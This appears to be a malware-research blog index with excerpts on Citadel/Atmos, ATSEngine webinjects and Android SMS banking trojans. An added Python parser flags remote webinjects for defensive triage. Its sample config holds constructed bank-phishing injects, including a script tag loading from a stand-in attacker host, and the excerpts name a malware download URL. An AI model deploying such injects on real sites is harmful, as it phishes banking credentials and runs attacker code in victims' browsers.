Tracking & Demystification of Cybercrime
Citadel 0.0.1.1 (Atmos)

The guys at JPCERT, 有難う御座います (thank you)! They released an update to their Citadel decrypter to make it compatible with the 0.0.1.1 sample. Citadel 0.0.1.1 doesn't have a lot of documentation, so the time has come to talk about it. Personally I know this malware under the name 'Atmos' (be ready for the name war in 3, 2, 1...). The first sample I was aware of is the one spotted by tilldenis...

Fri Feb 19, 2016 15:26
Install service for Malware affiliates and individuals

This install service had been running for a long time, but the server recently died. The people targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan. Login: Statistics by day: (Date, Unique visits, Total visits) Statistics by country: (Country, Unique visits, Percentage, Total visits) Statistics by version: (Version, Unique visits,...

Mon May 5, 2014 14:16
ATSEngine

ATSEngine injects are often found inside Zeus configs. They make the webinjects more dynamic, because most of the content is located remotely and can be updated much more easily than by pushing a new config to all the bots. That is the main difference between this and a standard webinject inside Zeus: the standard one only lets you make a static change in the page...

Sun May 4, 2014 02:12
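To make the static-versus-remote distinction from the ATSEngine entry concrete, here is an added example (not code from the original blog or from ATSEngine itself) that parses a Zeus-style webinject config and flags entries whose injected HTML pulls a script from a host other than the targeted bank. It assumes the common Zeus webinject text layout (set_url / data_before / data_inject / data_after, each block closed by data_end); the sample config, hostnames and the gate.php path are constructed placeholders, not indicators from any real campaign.

```python
"""Parse Zeus-style webinject configs and flag remote (ATS-style) injects.

Added example, not code from the original post. It assumes the well-known
Zeus webinject text format (set_url / data_before / data_inject /
data_after blocks, each closed by data_end). The sample config below is
constructed for illustration; every hostname in it is a placeholder.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: the first inject is static (adds a fake form field
# inline); the second is ATS-style, loading its real payload from a remote
# host at page-load time so the operator can change it without a new config.
SAMPLE_CONFIG = """\
set_url https://online.example-bank.test/login* GP
data_before
<input type="password"*>
data_end
data_inject
<br><label>Memorable word</label><input type="text" name="mword">
data_end
data_after
data_end

set_url https://ibank.example-bank.test/* GP
data_before
</head>
data_end
data_inject
<script type="text/javascript" src="https://ats-c2.example.test/gate.php?id=bank1"></script>
data_end
data_after
data_end
"""

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)


@dataclass
class Inject:
    url_mask: str
    flags: str
    data_before: str = ""
    data_inject: str = ""
    data_after: str = ""
    remote_scripts: list = field(default_factory=list)

    @property
    def is_remote(self) -> bool:
        """True when the injected HTML loads a script from a third-party host."""
        return bool(self.remote_scripts)


def parse_webinjects(text: str) -> list:
    """Split a webinject config into Inject records and mark remote ones."""
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url"):
            parts = stripped.split()
            current = Inject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section, buf = stripped, []
        elif stripped == "data_end" and current is not None and section:
            setattr(current, section, "\n".join(buf))
            section, buf = None, []
        elif section is not None:
            buf.append(line)
    # A script whose host differs from the targeted site is content the
    # attacker serves remotely; that is the ATS pattern described above.
    for inj in injects:
        target_host = urlparse(inj.url_mask.replace("*", "")).hostname or ""
        for src in SCRIPT_SRC.findall(inj.data_inject):
            host = urlparse(src).hostname or ""
            if host and host != target_host:
                inj.remote_scripts.append(src)
    return injects


def remote_hosts(injects: list) -> set:
    """Collect the third-party hosts an analyst would want to pivot on."""
    return {urlparse(s).hostname for inj in injects for s in inj.remote_scripts}


if __name__ == "__main__":
    for inj in parse_webinjects(SAMPLE_CONFIG):
        kind = "REMOTE (ATS-style)" if inj.is_remote else "static"
        print(f"{inj.url_mask:45} {kind} {inj.remote_scripts}")
```

Running the script over a real dumped config gives a quick triage view: static injects can be judged from the config alone, while the remote hosts returned by remote_hosts() are where the live inject logic actually sits and are the infrastructure worth blocking or monitoring.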
Android.Trojan.Rubobi.A (SmsPiratBot)

Another Android botnet dumped recently. This malware can send and intercept SMS on the bots. Like most Android botnets, it is mainly used to target mobile banking, such as Sberbank (www.sberbank.ru, the biggest bank in Russia). In Russia you can transfer money from one card to another card through mobile SMS. This botnet is sold for $120. Fake App: MD5:...

Sun Apr 27, 2014 23:36
Lame scareware

I found a sample yesterday downloaded via this URL: skyways.co/play.exe. It's a console application with ugly code, plus scareware and a third-party FakeAV call center. All of the following was so lame that I need to talk about it. At first the malware checks whether it has been dropped into %SYSTEMROOT%/system/. If not, it creates a file:...

Sun Apr 27, 2014 22:09
Android/FakeToken.A

OTP forwarder dumped months ago. Login: Statistics: Bots: Bot: Passwords: Send a command: Commands sent: Apps: Apps builder: MD5s: 2d4770137ae0b91446fc2f99d9fdb2b0 f629adcfbcdd4622ad75337ec0b1a0ff dd4ac55df6500352dd2cad340a36a40f b9f9614775a54aa42f94eedbc4796446 1fababfd02ea09ae924cd0a7dbfb708c bc8394bc9c6adbcfca3d450ee4ede44a 1cb87e1716c503bf499e529ee90e5b31...

Sun Apr 20, 2014 14:07
